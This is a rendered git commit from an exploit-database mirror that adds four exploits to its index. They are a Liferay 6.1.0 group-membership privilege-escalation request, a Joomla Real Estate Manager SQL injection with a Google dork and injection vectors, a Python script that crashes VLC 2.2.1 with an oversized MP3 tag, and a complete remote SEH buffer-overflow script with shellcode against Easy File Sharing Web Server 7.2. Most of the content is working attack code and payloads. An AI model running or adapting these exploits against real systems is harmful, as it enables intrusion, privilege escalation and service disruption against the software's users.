DB: 2015-10-25
4 new exploits
This commit is contained in:
parent
e75323a0d9
commit
a3e2d9b7a2
5 changed files with 235 additions and 0 deletions
|
@ -34727,7 +34727,9 @@ id,file,description,date,author,platform,type,port
|
||||||
38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0
|
38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0
|
||||||
38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
|
38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
|
||||||
38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
|
38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
|
||||||
|
38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0
|
||||||
38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
|
38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
|
||||||
|
38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL injection",2015-10-11,"Omer Ramić",php,webapps,0
|
||||||
38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
|
38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
|
||||||
38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0
|
38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0
|
||||||
38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
|
38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
|
||||||
|
@ -34761,6 +34763,7 @@ id,file,description,date,author,platform,type,port
|
||||||
38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help <= 3.1.2 Remote File Include and Path Disclosure Vulnerabilities",2013-04-19,ITTIHACK,php,webapps,0
|
38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help <= 3.1.2 Remote File Include and Path Disclosure Vulnerabilities",2013-04-19,ITTIHACK,php,webapps,0
|
||||||
38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
|
38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
|
||||||
38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
|
38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
|
||||||
|
38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - (.mp3) Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0
|
||||||
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
|
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
|
||||||
38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0
|
38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0
|
||||||
38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
|
38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
|
||||||
|
@ -34800,5 +34803,6 @@ id,file,description,date,author,platform,type,port
|
||||||
38523,platforms/php/webapps/38523.txt,"Weyal CMS Multiple SQL Injection Vulnerabilities",2013-05-23,XroGuE,php,webapps,0
|
38523,platforms/php/webapps/38523.txt,"Weyal CMS Multiple SQL Injection Vulnerabilities",2013-05-23,XroGuE,php,webapps,0
|
||||||
38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0
|
38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0
|
||||||
38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0
|
38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0
|
||||||
|
38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
|
||||||
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
|
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
|
||||||
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
|
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
41
platforms/php/webapps/38443.txt
Executable file
41
platforms/php/webapps/38443.txt
Executable file
|
@ -0,0 +1,41 @@
|
||||||
|
# Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation
|
||||||
|
# Date: 18/05/2015
|
||||||
|
# Exploit Author: Massimo De Luca - mentat.is
|
||||||
|
# Vendor Homepage: https://www.liferay.com
|
||||||
|
# Software Link:
|
||||||
|
http://www.liferay.com/it/community/releases/-/asset_publisher/nSr2/content/id/18060360
|
||||||
|
# Version: 6.1.0 CE
|
||||||
|
# Tested on: -
|
||||||
|
|
||||||
|
Explanation:
|
||||||
|
Any logged user can change his "User Group" membership by editing the
|
||||||
|
parameter _2_userGroupsSearchContainerPrimaryKeys in the HTTP POST REQUEST
|
||||||
|
generated when updating his profile in the page "Manage my account". This
|
||||||
|
may lead to privilege escalation.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
|
||||||
|
POST
|
||||||
|
/group/control_panel/manage?p_auth=J3jbveH7&p_p_id=2&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&doAsGroupId=19&refererPlid=10839&controlPanelCategory=my&_2_struts_action=%2Fmy_account%2Fedit_user
|
||||||
|
HTTP/1.1
|
||||||
|
[...]
|
||||||
|
[...]_2_organizationsSearchContainerPrimaryKeys=&_2_groupsSearchContainerPrimaryKeys=19&_2_userGroupsSearchContainerPrimaryKeys=[NEW
|
||||||
|
GROUP ID]&_2_groupRolesRoleIds=[...]
|
||||||
|
|
||||||
|
|
||||||
|
For your reference i'm attaching the full request in a separate file.
|
||||||
|
|
||||||
|
In order to test the vulnerability on a fresh installation:
|
||||||
|
- Create two different groups with different roles and permissions (ie:
|
||||||
|
one with administrator permissions, and a regular user)
|
||||||
|
-Create two different users,one for each group
|
||||||
|
|
||||||
|
Solution:
|
||||||
|
The vendor is aware of the problem and has fixed the issue in newer
|
||||||
|
releases
|
||||||
|
|
||||||
|
|
||||||
|
#Massimo De Luca
|
||||||
|
#mdeluca [at] mentat.is
|
||||||
|
#Mentat.is
|
58
platforms/php/webapps/38445.txt
Executable file
58
platforms/php/webapps/38445.txt
Executable file
|
@ -0,0 +1,58 @@
|
||||||
|
# Description of component:
|
||||||
|
This Joomla component is perfect for independent estate agents, property
|
||||||
|
rental companies and agencies, hotel booking, hotel manage, motel booking,
|
||||||
|
motel manage.
|
||||||
|
|
||||||
|
##################################################################################################
|
||||||
|
# Exploit Title: [Joomla component com_realestatemanager - SQL injection]
|
||||||
|
# Google Dork: [inurl:option=com_realestatemanager]
|
||||||
|
# Date: [2015-10-10]
|
||||||
|
# Exploit Author: [Omer Ramić]
|
||||||
|
# Vendor Homepage: [http://ordasoft.com/]
|
||||||
|
# Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
|
||||||
|
# Version: [3.7] & probably all prior
|
||||||
|
#Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
|
||||||
|
##################################################################################################
|
||||||
|
|
||||||
|
#Multiple vulnerable parameters (POC given only for the first parametar):
|
||||||
|
Parameter_1: order_direction (POST)
|
||||||
|
Parameter_2: order_field (POST)
|
||||||
|
|
||||||
|
|
||||||
|
#The vulnerable parameters 1 & 2 are within the following request:
|
||||||
|
POST
|
||||||
|
/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
|
||||||
|
HTTP/1.1
|
||||||
|
Host: [HOST]
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101
|
||||||
|
Firefox/38.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://
|
||||||
|
[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
|
||||||
|
Cookie: security_level=0;
|
||||||
|
9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
|
||||||
|
Connection: keep-alive
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 37
|
||||||
|
|
||||||
|
order_direction=asc&order_field=price
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#Vectors:
|
||||||
|
POC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE
|
||||||
|
7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)
|
||||||
|
END))&order_field=price
|
||||||
|
|
||||||
|
POC_2: order_direction=asc,(SELECT 1841 FROM(SELECT
|
||||||
|
COUNT(*),CONCAT(0x716b787671,(SELECT
|
||||||
|
(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM
|
||||||
|
|
||||||
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price
|
||||||
|
|
||||||
|
|
||||||
|
###################################
|
||||||
|
# Greets to Palestine from Bosnia #
|
||||||
|
###################################
|
42
platforms/windows/dos/38485.py
Executable file
42
platforms/windows/dos/38485.py
Executable file
|
@ -0,0 +1,42 @@
|
||||||
|
# Exploit Title: VLC | libvlccore - (.mp3) Stack Overflow
|
||||||
|
# Date: 18/10/2015
|
||||||
|
# Exploit Author: Andrea Sindoni
|
||||||
|
# Software Link: https://www.videolan.org/vlc/index.it.html
|
||||||
|
# Version: 2.2.1
|
||||||
|
# Tested on: Windows 7 Professional 64 bits
|
||||||
|
#
|
||||||
|
# PoC with MP3: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38485.zip
|
||||||
|
#
|
||||||
|
|
||||||
|
#APP: vlc.exe
|
||||||
|
#ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre
|
||||||
|
#FOLLOWUP_NAME: MachineOwner
|
||||||
|
#MODULE_NAME: libvlccore
|
||||||
|
#IMAGE_NAME: libvlccore.dll
|
||||||
|
#FAILURE_ID_HASH_STRING: um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd
|
||||||
|
#Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62
|
||||||
|
#EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
|
||||||
|
#ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3)
|
||||||
|
# ExceptionCode: c00000fd (Stack overflow)
|
||||||
|
# ExceptionFlags: 00000000
|
||||||
|
#NumberParameters: 2
|
||||||
|
# Parameter[0]: 0000000000000001
|
||||||
|
# Parameter[1]: 0000000025ed2a20
|
||||||
|
#
|
||||||
|
#eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001
|
||||||
|
#eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0 nv up ei pl nz na po nc
|
||||||
|
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
|
||||||
|
#
|
||||||
|
#Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62)
|
||||||
|
#
|
||||||
|
|
||||||
|
import eyed3
|
||||||
|
|
||||||
|
value = u'B'*6500000
|
||||||
|
|
||||||
|
audiofile = eyed3.load("base.mp3")
|
||||||
|
audiofile.tag.artist = value
|
||||||
|
audiofile.tag.album = u'andrea'
|
||||||
|
audiofile.tag.album_artist = u'sindoni'
|
||||||
|
|
||||||
|
audiofile.tag.save()
|
90
platforms/windows/remote/38526.py
Executable file
90
platforms/windows/remote/38526.py
Executable file
|
@ -0,0 +1,90 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
|
||||||
|
# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
|
||||||
|
# vulnerable file /changeuser.ghp > Cookies UserID=[buf]
|
||||||
|
# Means there are two ways to exploit changeuser.ghp
|
||||||
|
# Tested on Win7 x64 and x86, it should work on win8/win10
|
||||||
|
# By Audit0r
|
||||||
|
# https://twitter.com/Audit0rSA
|
||||||
|
|
||||||
|
|
||||||
|
import sys, socket, struct
|
||||||
|
|
||||||
|
|
||||||
|
if len(sys.argv) <= 1:
|
||||||
|
print "Usage: python efsws.py [host] [port]"
|
||||||
|
exit()
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
port = int(sys.argv[2])
|
||||||
|
|
||||||
|
|
||||||
|
# https://code.google.com/p/win-exec-calc-shellcode/
|
||||||
|
shellcode = (
|
||||||
|
|
||||||
|
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
|
||||||
|
|
||||||
|
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
|
||||||
|
|
||||||
|
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
|
||||||
|
|
||||||
|
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
|
||||||
|
|
||||||
|
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
|
||||||
|
|
||||||
|
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
|
||||||
|
|
||||||
|
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
|
||||||
|
|
||||||
|
"\x1c\x39\xbd"
|
||||||
|
|
||||||
|
)
|
||||||
|
|
||||||
|
print "[+]Connecting to" + host
|
||||||
|
|
||||||
|
|
||||||
|
craftedreq = "A"*4059
|
||||||
|
|
||||||
|
craftedreq += "\xeb\x06\x90\x90" # basic SEH jump
|
||||||
|
|
||||||
|
craftedreq += struct.pack("<I", 0x10017743) # pop commands from ImageLoad.dll
|
||||||
|
|
||||||
|
craftedreq += "\x90"*40 # NOPer
|
||||||
|
|
||||||
|
craftedreq += shellcode
|
||||||
|
|
||||||
|
craftedreq += "C"*50 # filler
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
httpreq = (
|
||||||
|
|
||||||
|
"GET /changeuser.ghp HTTP/1.1\r\n"
|
||||||
|
|
||||||
|
"User-Agent: Mozilla/4.0\r\n"
|
||||||
|
|
||||||
|
"Host:" + host + ":" + str(port) + "\r\n"
|
||||||
|
|
||||||
|
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||||
|
|
||||||
|
"Accept-Language: en-us\r\n"
|
||||||
|
|
||||||
|
"Accept-Encoding: gzip, deflate\r\n"
|
||||||
|
|
||||||
|
"Referer: http://" + host + "/\r\n"
|
||||||
|
|
||||||
|
"Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n"
|
||||||
|
|
||||||
|
"Conection: Keep-Alive\r\n\r\n"
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
print "[+]Sending the Calc...."
|
||||||
|
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
s.connect((host, port))
|
||||||
|
|
||||||
|
s.send(httpreq)
|
||||||
|
|
||||||
|
s.close()
|
Loading…
Add table
Reference in a new issue